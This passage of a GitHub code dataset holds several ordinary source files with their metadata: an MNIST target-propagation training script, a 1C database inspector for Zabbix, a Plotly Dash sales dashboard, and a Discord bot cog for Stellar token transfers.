"line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 45, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 46, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}]}
+{"seq_id": "38218810516", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 26 13:48:49 2018\n\n@author: will\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom mnist import MNIST\n\ndef softmax(x):\n norm = 0\n mx = max(x)\n for i in range(len(x)):\n norm += np.exp(x[i]-mx)\n return np.exp(x-mx)/norm\n\n\ndef deriv_softmax(s):\n return s*(1-s)\n\n\n\ndef base_non_linearity(x):\n if (x>500):\n return x\n return np.log(1+np.exp(x))\n\nnon_linearity = np.vectorize(base_non_linearity)\n\ndef deriv(x):\n return 1/(1+np.exp(-x))\n\ndef gen_one_hot(x):\n out = np.zeros(10)\n out[x] = 1\n return out\n\ndef calc_accuracy(num):\n tot_correct = 0\n for i in tqdm(range(num)):\n hidden_layer = non_linearity(input_to_hidden_weights.dot(test_images[i])).reshape((hidden_layer_size,1))\n output_layer = softmax(hidden_to_output_weights.dot(hidden_layer))\n pred = np.argmax(output_layer)\n if(pred == test_labels[i]):\n tot_correct += 1\n return tot_correct/num\n \n \n \nmndata = MNIST('/home/will/Dropbox/isicni_project/MNIST_data')\nmndata.gz = True\nimages, labels = mndata.load_training()\n\ntest_images, test_labels = mndata.load_testing()\n\n\nimages = np.array(images)\nlabels = np.array(labels)\ntest_images = np.array(test_images)\ntest_labels = np.array(test_labels)\n\nimages = images/255\ntest_images = test_images/255\n\none_hot_labels = []\n\nfor i in range(len(labels)):\n one_hot_labels.append(gen_one_hot(labels[i]))\none_hot_labels = np.array(one_hot_labels)\n\n\nlearning_rate = 0.01\nauto_learning_rate = 0.01\n\ninput_size = 784\nhidden_layer_size = 50\noutput_size = 10\n\nbias_input_to_hidden = np.random.uniform(-1,1,(hidden_layer_size,1))\ninput_to_hidden_weights = np.random.uniform(-1,1,(hidden_layer_size,input_size))\nhidden_to_output_weights = np.random.uniform(-1,1,(output_size,hidden_layer_size))\nbias_hidden_to_output = np.random.uniform(-1,1,(output_size,1))\n\nautoencoder_output_to_hidden = np.random.uniform(-1,1,(hidden_layer_size,output_size))\nbias_autoencoder = np.random.uniform(-1,1,(hidden_layer_size,1))\n\nnum_batches = 1\n\ninv_dist_store = []\n\n#acc = calc_accuracy(len(test_images))\n#print(acc)\n\nfor _ in range(num_batches):\n \n for i in tqdm(range(len(images))):\n idx = np.random.randint(0,len(images))\n target = one_hot_labels[idx].reshape((output_size,1))\n hidden_layer = non_linearity(input_to_hidden_weights.dot(images[idx]).reshape((hidden_layer_size,1))+ bias_input_to_hidden).reshape((hidden_layer_size,1))\n output_layer = softmax(hidden_to_output_weights.dot(hidden_layer) + bias_hidden_to_output)\n db_hidden_out = (output_layer - target).reshape((output_size,1))\n dw_hidden_output = np.dot((output_layer - target),hidden_layer.T)\n \n hidden_to_output_weights += -learning_rate*dw_hidden_output -learning_rate*0.1*hidden_to_output_weights \n bias_hidden_to_output += -learning_rate*db_hidden_out -learning_rate*0.1*bias_hidden_to_output \n \n \n noisy_hidden = (hidden_layer + np.random.normal(0,0.0001,(hidden_layer_size,1))).reshape((hidden_layer_size,1))\n noisy_output = softmax(hidden_to_output_weights.dot(noisy_hidden) + bias_hidden_to_output )\n \n auto_hidden = non_linearity(autoencoder_output_to_hidden.dot(noisy_output)+ bias_autoencoder ).reshape((hidden_layer_size,1))\n \n auto_deriv = deriv(autoencoder_output_to_hidden.dot(noisy_output).reshape((hidden_layer_size,1)) +bias_autoencoder ).reshape((hidden_layer_size,1))\n if(i%5000):\n inv_dist_store.append(np.mean(np.abs(non_linearity(autoencoder_output_to_hidden.dot(output_layer)).reshape((hidden_layer_size,1)) - hidden_layer)))\n \n dw_auto = np.dot((auto_hidden - noisy_hidden)*auto_deriv,noisy_output.T) \n dw_auto_bias = (auto_hidden - noisy_hidden)*auto_deriv\n \n autoencoder_output_to_hidden += -auto_learning_rate*dw_auto - auto_learning_rate*0.1*autoencoder_output_to_hidden\n bias_autoencoder += -auto_learning_rate*dw_auto_bias - auto_learning_rate*0.1*bias_autoencoder \n \n target_hidden = hidden_layer + non_linearity(autoencoder_output_to_hidden.dot(target)+bias_autoencoder ) - non_linearity(autoencoder_output_to_hidden.dot(output_layer)+bias_autoencoder )\n \n der = deriv(input_to_hidden_weights.dot(images[idx]).reshape((hidden_layer_size,1)) +bias_input_to_hidden).reshape((hidden_layer_size,1))\n \n dw_input_hidden = np.dot((hidden_layer - target_hidden)*der,(images[idx].reshape(784,1)).T)\n db_input_hidden = (hidden_layer - target_hidden)*der\n \n input_to_hidden_weights += -learning_rate*dw_input_hidden - learning_rate*0.05*input_to_hidden_weights\n bias_input_to_hidden += -learning_rate*db_input_hidden - learning_rate*0.1*bias_input_to_hidden\n acc = calc_accuracy(len(test_images))\n print(acc)\n auto_learning_rate = auto_learning_rate/1.05\n learning_rate = learning_rate/1.05\n\ninv_dist_store = np.array(inv_dist_store)\n", "repo_name": "EntropicEffect/dendritic_backprop", "sub_path": "difference_target_prop.py", "file_name": "difference_target_prop.py", "file_ext": "py", "file_size_in_byte": 5093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.exp", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.vectorize", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 46, "usage_type": "call"}, {"api_name": "mnist.MNIST", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 111, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "25174855251", "text": "#coding: utf-8\r\nimport onec_dtools #pip install onec_dtools\r\nimport sys\r\nimport json\r\nimport os\r\nif type(sys.argv[1]) == type('str'):\r\n db_path = sys.argv[1]\r\nelse:\r\n db_path = sys.argv[1].decode(sys.getfilesystemencoding())\r\ntry:\r\n with open(db_path, 'rb') as f:\r\n db = onec_dtools.DatabaseReader(f)\r\n version = db.version\r\n tables_q = len(db.tables)\r\n data = []\r\n db_size = os.path.getsize(db_path)\r\n data.append({'{version}': version,\r\n '{tables_q}': tables_q,\r\n '{db_size}': db_size,\r\n })\r\n outtext = (json.dumps(data, ensure_ascii=False)).encode('utf8')\r\n sys.stdout.buffer.write(outtext)\r\nexcept Exception as e:\r\n print('Error')\r\n print(str(type(db_path)))\r\n print(e)\r\n", "repo_name": "orange391224/zabbix-1CD", "sub_path": "src/test1C.py", "file_name": "test1C.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.getfilesystemencoding", "line_number": 9, "usage_type": "call"}, {"api_name": "onec_dtools.DatabaseReader", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stdout.buffer.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "33782163919", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\nimport pandas as pd\nimport random\nfrom dash.dependencies import Input, Output\n\necom_sales = pd.read_csv('/usr/local/share/datasets/ecom_sales.csv')\nmajor_categories = list(ecom_sales['Major Category'].unique())\nminor_categories = list(ecom_sales['Minor Category'].unique())\nlogo_link = 'https://assets.datacamp.com/production/repositories/5893/datasets/fdbe0accd2581a0c505dab4b29ebb66cf72a1803/e-comlogo.png'\necom_country = ecom_sales.groupby('Country')['OrderValue'].agg(['sum', 'count']).reset_index().rename(\n columns={'count': 'Sales Volume', 'sum': 'Total Sales ($)'})\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div([\n html.Img(src=logo_link,\n style={'margin': '30px 0px 0px 0px'}),\n html.H1('Sales breakdowns'),\n html.Div(\n children=[\n html.Div(\n children=[\n html.H2('Controls'),\n html.Br(),\n html.H3('Major Category Select'),\n dcc.Dropdown(\n id='major_cat_dd',\n options=[{'label': category, 'value': category} for category in major_categories],\n style={'width': '200px', 'margin': '0 auto'}),\n html.Br(),\n html.H3('Minor Category Select'),\n dcc.Dropdown(\n id='minor_cat_dd',\n style={'width': '200px', 'margin': '0 auto'})\n ],\n style={'width': '350px', 'height': '350px', 'display': 'inline-block',\n 'vertical-align': 'top', 'border': '1px solid black', 'padding': '20px'}),\n html.Div(\n children=[\n dcc.Graph(id='sales_line'),\n html.H3(id='chosen_major_cat_title')\n ],\n style={'width': '700px', 'height': '650px', 'display': 'inline-block'})\n ]), ],\n style={'text-align': 'center', 'display': 'inline-block', 'width': '100%'})\n\n\n# One callback to set minor values & HTML output\n@app.callback(\n Output('minor_cat_dd', 'options'),\n Output('chosen_major_cat_title', 'children'),\n Input('major_cat_dd', 'value'))\ndef update_minor_dd(major_cat_dd):\n major_minor = ecom_sales[['Major Category', 'Minor Category']].drop_duplicates()\n relevant_minor_options = major_minor[major_minor['Major Category'] == major_cat_dd][\n 'Minor Category'].values.tolist()\n minor_options = [{'label': x, 'value': x} for x in relevant_minor_options]\n\n if not major_cat_dd:\n major_cat_dd = 'None Selected'\n # Creating string for title\n major_cat_title = f'This is in the Major Category of : {major_cat_dd}'\n\n # Return the options and title\n return minor_options, major_cat_title\n\n\n# Create a callback to set a default minor category value\n@app.callback(\n Output('minor_cat_dd', 'value'),\n Input('minor_cat_dd', 'options'))\ndef select_minor_cat(options):\n chosen_val = 'None'\n if options:\n vals = [x['value'] for x in options]\n chosen_val = random.choice(vals)\n return chosen_val\n\n\n@app.callback(\n Output('sales_line', 'figure'),\n Input('minor_cat_dd', 'value'))\ndef update_line(minor_cat):\n minor_cat_title = 'All'\n ecom_line = ecom_sales.copy()\n\n if minor_cat:\n minor_cat_title = minor_cat\n ecom_line = ecom_line[ecom_line['Minor Category'] == minor_cat]\n\n ecom_line = ecom_line.groupby('Year-Month')['OrderValue'].agg('sum').reset_index(name='Total Sales ($)')\n line_graph = px.line(ecom_line, x='Year-Month', y='Total Sales ($)',\n title=f'Total Sales by Month for Minor Category: {minor_cat_title}')\n\n return line_graph\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)", "repo_name": "ivan-mihailov/Datacamp_Plotly_Dash", "sub_path": "Chapter_4/ext_chain_callbacks.py", "file_name": "ext_chain_callbacks.py", "file_ext": "py", "file_size_in_byte": 3873, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 16, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 18, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 19, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 21, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 22, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 24, "usage_type": "call"}, {"api_name": "dash_html_components.H2", "line_number": 26, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 27, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 28, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 33, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 34, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 35, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.H3", "line_number": 44, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 53, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 54, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 55, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 79, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 73, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 74, "usage_type": "call"}, {"api_name": "plotly.express.line", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 84, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "74800737689", "text": "from nextcord.ext import commands\nfrom nextcord import User\nimport re\nfrom cogs.utils import monetaryConversions\nfrom utils.customCogChecks import is_public, has_wallet\nfrom cogs.utils.systemMessaages import CustomMessages\n\ncustom_messages = CustomMessages()\nCONST_STELLAR_EMOJI = '<:stelaremoji:684676687425961994>'\nCONST_TX_ERROR_TITLE = \":exclamation: __Transaction Error__ :exclamation: \"\n\n\ndef process_message(message):\n \"\"\"\n Filter message so it is not too long for transaction report\n \"\"\"\n if message:\n if len(message) > 100:\n message = message[:98] + '...'\n else:\n message = 'None'\n\n return message\n\n\nclass TransactionCommands(commands.Cog):\n \"\"\"\n Class handling off-chain discord transactions\n \"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.backoffice = bot.backoffice\n\n def build_stats(self, transaction_data: dict, tx_type: str):\n \"\"\"\n Process data according to the type of transaction\n \"\"\"\n if tx_type == \"public\":\n processed = {\"globalBot\": {\"totalTx\": 1,\n 'totalMoved': transaction_data[\"amount\"],\n \"totalPublicCount\": 1,\n \"totalPublicMoved\": transaction_data[\"amount\"]},\n \"senderStats\": {f\"{transaction_data['ticker']}.publicTxSendCount\": 1,\n f\"{transaction_data['ticker']}.publicSent\": transaction_data[\"amount\"],\n },\n \"recipientStats\": {f\"{transaction_data['ticker']}.publicTxReceivedCount\": 1,\n f\"{transaction_data['ticker']}.publicReceived\": transaction_data[\n \"amount\"],\n },\n \"guildStats\": {\n f'{transaction_data[\"ticker\"]}.publicCount': 1,\n f\"{transaction_data['ticker']}.txCount\": 1,\n f\"{transaction_data['ticker']}.volume\": transaction_data[\"amount\"]\n }\n }\n\n elif tx_type == 'private':\n processed = {\"globalBot\": {\"totalTx\": 1,\n 'totalMoved': transaction_data[\"amount\"],\n \"totalPrivateCount\": 1,\n \"totalPrivateMoved\": transaction_data[\"amount\"]},\n \"senderStats\": {f\"{transaction_data['ticker']}.privateTxSendCount\": 1,\n f\"{transaction_data['ticker']}.privateSent\": transaction_data[\"amount\"],\n },\n \"recipientStats\": {f\"{transaction_data['ticker']}.privateTxReceivedCount\": 1,\n f\"{transaction_data['ticker']}.privateReceived\": transaction_data[\n \"amount\"],\n },\n \"guildStats\": {\n f'{transaction_data[\"ticker\"]}.privateCount': 1,\n f\"{transaction_data['ticker']}.txCount\": 1,\n f\"{transaction_data['ticker']}.volume\": transaction_data[\"amount\"]\n }\n }\n\n return processed\n\n async def update_stats(self, ctx, transaction_data: dict, tx_type: str):\n \"\"\"\n Update all required stats when transaction is executed\n \"\"\"\n processed_stats = self.build_stats(transaction_data=transaction_data, tx_type=tx_type)\n\n # Update stats stats\n await self.backoffice.stats_manager.update_cl_off_chain_stats(ticker=transaction_data[\"ticker\"],\n ticker_stats=processed_stats[\"globalBot\"])\n\n # Updates sender and recipient public transaction stats\n await self.backoffice.stats_manager.update_usr_tx_stats(user_id=ctx.message.author.id,\n tx_stats_data=processed_stats['senderStats'])\n await self.backoffice.stats_manager.update_usr_tx_stats(user_id=transaction_data[\"recipientId\"],\n tx_stats_data=processed_stats[\"recipientStats\"])\n\n await self.backoffice.stats_manager.update_guild_stats(guild_id=ctx.message.guild.id,\n guild_stats_data=processed_stats[\"guildStats\"])\n\n async def stream_transaction(self, ctx, recipient, tx_details: dict, message: str, tx_type: str):\n \"\"\"\n Send reports out to all destinations\n \"\"\"\n # Process message\n msg = process_message(message=message)\n # Send to channel where tx has been executed\n native_token = None\n if tx_details['ticker'] == 'xlm':\n native_token = \"stellar\"\n\n if native_token:\n in_dollar = monetaryConversions.convert_to_usd(amount=tx_details[\"amount\"], coin_name='stellar')\n tx_report_msg = f\"{ctx.message.author} just sent {recipient.mention} {tx_details['amount']:.7f}\" \\\n f\" {tx_details['emoji']} (${in_dollar['total']:.4f})\"\n explorer_msg = f'💵 {tx_details[\"amount\"]:.7f} {CONST_STELLAR_EMOJI} (${in_dollar[\"total\"]:.4f}) on ' \\\n f'{ctx.message.guild} channel {ctx.message.channel}'\n total_dollar_value = in_dollar['total']\n conversion_rate = in_dollar[\"usd\"]\n else:\n explorer_msg = f'💵 {tx_details[\"amount\"]} {tx_details[\"assetCode\"].upper()} on ' \\\n f'{ctx.message.guild} channel {ctx.message.channel}'\n tx_report_msg = f\"{ctx.message.author} just sent {recipient.mention} {tx_details['amount']:.7f} \" \\\n f\"{tx_details['assetCode'].upper()}\"\n total_dollar_value = 0\n conversion_rate = 0\n\n if tx_type == 'private':\n explorer_msg = \":detective: \"\n\n await custom_messages.transaction_report_to_channel(ctx=ctx, message=tx_report_msg, tx_type=tx_type)\n\n tx_details[\"conversion\"] = total_dollar_value\n tx_details[\"conversionRate\"] = conversion_rate\n\n # report to sender\n\n await custom_messages.transaction_report_to_user(ctx=ctx, user=recipient, transaction_data=tx_details,\n destination=ctx.message.author,\n direction=0, tx_type=tx_type,\n message=msg)\n\n # report to recipient\n await custom_messages.transaction_report_to_user(ctx=ctx, user=ctx.message.author, transaction_data=tx_details,\n destination=recipient,\n direction=1, tx_type=tx_type,\n message=msg)\n\n # Send out explorer\n\n load_channels = [self.bot.get_channel(int(chn)) for chn in\n self.backoffice.guild_profiles.get_all_explorer_applied_channels()]\n\n await custom_messages.explorer_messages(applied_channels=load_channels, message=explorer_msg)\n\n async def send_impl(self, ctx, amount: float, ticker: str, recipient: User, *, tx_type: str, message: str = None):\n coin = ticker.lower()\n if amount > 0:\n if not ctx.message.author == recipient and not recipient.bot:\n supported = [sup[\"assetCode\"] for sup in self.bot.backoffice.token_manager.get_registered_tokens() if\n sup[\"assetCode\"] == coin]\n if supported or coin == 'xlm':\n coin_data = self.backoffice.token_manager.get_token_details_by_code(coin)\n atomic_value = (int(amount * (10 ** 7)))\n\n # Get user wallet ticker balance\n wallet_value = self.backoffice.wallet_manager.get_ticker_balance(asset_code=coin,\n user_id=ctx.message.author.id)\n\n if wallet_value:\n if wallet_value >= atomic_value:\n # Check if recipient has wallet or not\n if not self.backoffice.account_mng.check_user_existence(user_id=recipient.id):\n self.backoffice.account_mng.register_user(discord_id=recipient.id,\n discord_username=f'{recipient}')\n\n # Update user count in guild system\n await self.backoffice.stats_manager.update_registered_users(\n guild_id=ctx.message.guild.id)\n\n # Increase bridge\n await self.backoffice.stats_manager.create_bridge(user_id=ctx.message.author.id)\n\n # Send up link\n load_channels = [self.bot.get_channel(int(chn)) for chn in\n self.backoffice.guild_profiles.get_all_explorer_applied_channels()]\n current_total = self.backoffice.account_mng.count_registrations()\n\n explorer_msg = f':new: user registered into ***{self.bot.user} System*** ' \\\n f'(Σ {current_total})'\n for chn in load_channels:\n if chn is not None:\n await chn.send(content=explorer_msg)\n\n await custom_messages.bridge_notification(ctx, recipient=recipient)\n\n # Deduct balance from sender\n if self.backoffice.wallet_manager.update_coin_balance(coin=coin,\n user_id=ctx.message.author.id,\n amount=int(atomic_value),\n direction=2):\n # Append to recipient\n if self.backoffice.wallet_manager.update_coin_balance(coin=coin, user_id=recipient.id,\n amount=int(atomic_value),\n direction=1):\n\n normal_value = (atomic_value / (10 ** 7))\n\n coin_data[\"amount\"] = normal_value\n coin_data[\"ticker\"] = coin\n\n # Produce dict for streamer\n await self.stream_transaction(ctx=ctx, recipient=recipient, tx_details=coin_data,\n message=message, tx_type=tx_type)\n\n coin_data[\"recipientId\"] = recipient.id\n\n await self.update_stats(ctx=ctx, transaction_data=coin_data, tx_type=tx_type)\n\n else:\n self.backoffice.wallet_manager.update_coin_balance(coin=coin,\n user_id=ctx.message.author.id,\n amount=int(atomic_value),\n direction=1)\n message = f'{amount} {coin.upper()} could not be sent to the {recipient} ' \\\n f'please try again later'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n else:\n message = f'There has been an error while making P2P transaction please try again later'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'You have insufficient balance! Your current wallet balance is' \\\n f' {wallet_value / (10 ** 7)} XLM'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'Your wallet balance of token ***{coin.upper()}*** is 0.0000000. Before you can ' \\\n f'make payment you need to first deposit some.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n\n message = f'Coin {coin} has not been integrated yet into {self.bot.user}.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = f'You are not allowed to send {amount} xlm to either yourself or the bot.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message,\n destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Amount needs to be greater than 0.0000000 XLM'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @commands.group()\n @commands.check(is_public)\n @commands.check(has_wallet)\n @commands.guild_only()\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def send(self, ctx, recipient: User, amount: float, asset_code: str, *, message: str = None):\n if not re.search(\"[~!#$%^&*()_+{}:;\\']\", asset_code.lower()):\n if amount > 0:\n await self.send_impl(ctx, amount, asset_code.lower(), recipient, tx_type=\"public\", message=message)\n else:\n message = f'Amount needs to be greater than 0.0000000 {asset_code.upper()}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Special characters are not allowed in token code'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @commands.group()\n @commands.check(is_public)\n @commands.check(has_wallet)\n @commands.guild_only()\n @commands.cooldown(1, 10, commands.BucketType.user)\n async def private(self, ctx, recipient: User, amount: float, asset_code: str, *, message: str = None):\n if not re.search(\"[~!#$%^&*()_+{}:;\\']\", asset_code.lower()):\n if amount > 0:\n await self.send_impl(ctx, amount, asset_code.lower(), recipient, tx_type=\"private\", message=message)\n else:\n message = f'Amount needs to be greater than 0.0000000 {asset_code.upper()}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n else:\n message = 'Special characters are not allowed in token code'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=CONST_TX_ERROR_TITLE)\n\n @send.error\n async def send_error(self, ctx, error):\n if isinstance(error, commands.CheckFailure):\n title = f'__System Transaction Error__'\n message = f'In order to execute P2P transaction you need to be registered into the system, and ' \\\n f'transaction request needs to be executed on one of the text public text channels ' \\\n f'on {ctx.message.guild}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, commands.BadArgument):\n title = f'__Bad Argument Provided __'\n message = f'You have provided wrong argument either for amount or than for the recipient'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, AssertionError):\n title = f'__Amount Check failed __'\n message = f'You have provided wrong amount for tx value.'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n elif isinstance(error, commands.CommandOnCooldown):\n title = f'__Command on cool-down__!'\n message = f'{error}. Please try again after {error.retry_after}s'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n\n elif isinstance(error, commands.MissingRequiredArgument):\n title = f'__Missing Required Argument Error __'\n message = f'{str(error)}'\n await custom_messages.system_message(ctx=ctx, color_code=1, message=message, destination=1,\n sys_msg_title=title)\n\n\ndef setup(bot):\n bot.add_cog(TransactionCommands(bot))\n", "repo_name": "Crypto-Link-Payments/crypto-link", "sub_path": "cogs/transactions.py", "file_name": "transactions.py", "file_ext": "py", "file_size_in_byte": 19256, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cogs.utils.systemMessaages.CustomMessages", "line_number": 8, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.Cog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "nextcord.ext.commands", "line_number": 26, "usage_type": "name"}, {"api_name": "cogs.utils.monetaryConversions.convert_to_usd", "line_number": 110, "usage_type": "call"}, {"api_name": "cogs.utils.monetaryConversions", "line_number": 110, "usage_type": "name"}, {"api_name": "nextcord.User", "line_number": 153, "usage_type": "name"}, {"api_name": "nextcord.User", "line_number": 265, "usage_type": "name"}, {"api_name": "re.search", "line_number": 266, "usage_type": "call"}, {"api_name": "nextcord.ext.commands.group", "line_number": 260, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 260, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 261, "usage_type": "call"}, {"api_name": "utils.customCogChecks.is_public", "line_number": 261, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 261, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.check", "line_number": 262, "usage_type": "call"}, {"api_name": "utils.customCogChecks.has_wallet", "line_number": 262, "usage_type": "argument"}, {"api_name": "nextcord.ext.commands", "line_number": 262, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.guild_only", "line_number": 263, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 263, "usage_type": "name"}, {"api_name": "nextcord.ext.commands.cooldown", "line_number": 264, "usage_type": "call"}, {"api_name": "nextcord.ext.commands", "line_number": 264, "usage_type": "name"}, {"api_name": 